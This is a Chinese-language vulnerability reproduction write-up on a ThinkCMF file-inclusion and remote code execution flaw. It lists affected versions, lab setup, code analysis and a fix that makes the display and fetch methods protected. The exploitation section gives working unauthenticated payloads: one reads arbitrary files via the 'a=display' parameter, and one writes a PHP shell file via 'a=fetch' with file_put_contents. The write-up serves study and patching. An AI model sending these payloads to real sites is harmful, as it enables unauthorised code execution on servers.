ThinkCMF框架任意内容包含漏洞分析复现

0x01简介

ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。
每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本。

0x02漏洞介绍

远程攻击者在无需任何权限情况下,通过构造特定的请求包即可在远程服务器上执行任意代码

0x03影响版本

ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
ThinkCMF X2.2.3

0x04环境搭建

windows 2008R2
phpstudy2018
ThinkCMFX2.2.2下载链接:
https://pan.baidu.com/s/1rK1-_BLmH1VPXsIUfr1VUw 提取码:wuhw
把ThinkCMF X2.2.2版本,放入phpstudy中的www目录下,在浏览器访问即可出现安装向导


按照安装向导填入自己的配置一步步安装即可

环境搭建成功如下图所示

0x05漏洞利用

1.通过构造a参数的display()方法,实现任意内容包含漏洞
Payload:?a=display&templateFile=README.md

2.通过构造a参数的fetch()方法,不需要知道文件路径就可以实现任意文件写入
Payload:
?a=fetch&templateFile=public/index&prefix=’’&content=file_put_contents(‘shell.php’,’<?php phpinfo(); ?>’)

执行payload,页面是空白的

访问shell.php,可以看到phpinfo已经加载出来

0x06代码分析

首先看下入口文件index.php看一下程序的项目路径

在项目路径下找到入口分组的控制器类选择IndexController 控制器类打开,可以知道继承了HomebaseController,通过gma参数指定分组模块方法,这里可以通过a参数直接调用PortalIndexController父类(HomebaseController)中的一些权限为public的方法。

可以看的的public方法里就有display()、fetch(),还有方法作用及参数含义。
display函数的作用是加载模板和页面输出,所对应的参数为:templateFile为模板文件地址,charset模板字符集,contentType输出类型,content输出内容。

templateFile参数会经过parseTemplate()方法处理。
在applicationCommonControllerAdminbaseController.class.php的parseTemplate()方法如下

parseTemplate()方法作用:判断模板主题是否存在,当模板主题不存在时会在当前目录下开始查找,形成文件包含。
payload :
index.php?a=display&templateFile=README.md

这里fetch函数的三个参数分别对应模板文件,输出内容,模板缓存前缀。利用时templateFile和prefix参数可以为空,在content参数传入待注入的php代码即可。

0x07修复方式

将HomebaseController.class.php和AdminbaseController.class.php类中display和fetch函数的修饰符改为protected。

免责申明:
本项目仅进行信息搜集,漏洞探测工作,无漏洞利用、攻击性行为,发文初衷为仅为方便安全人员对授权项目完成测试工作和学习交流使用。 请使用者遵守当地相关法律,勿用于非授权测试,勿用于非授权测试,勿用于非授权测试~~(重要的事情说三遍)~~,如作他用所承受的法律责任一概与东塔安全学院无关!!!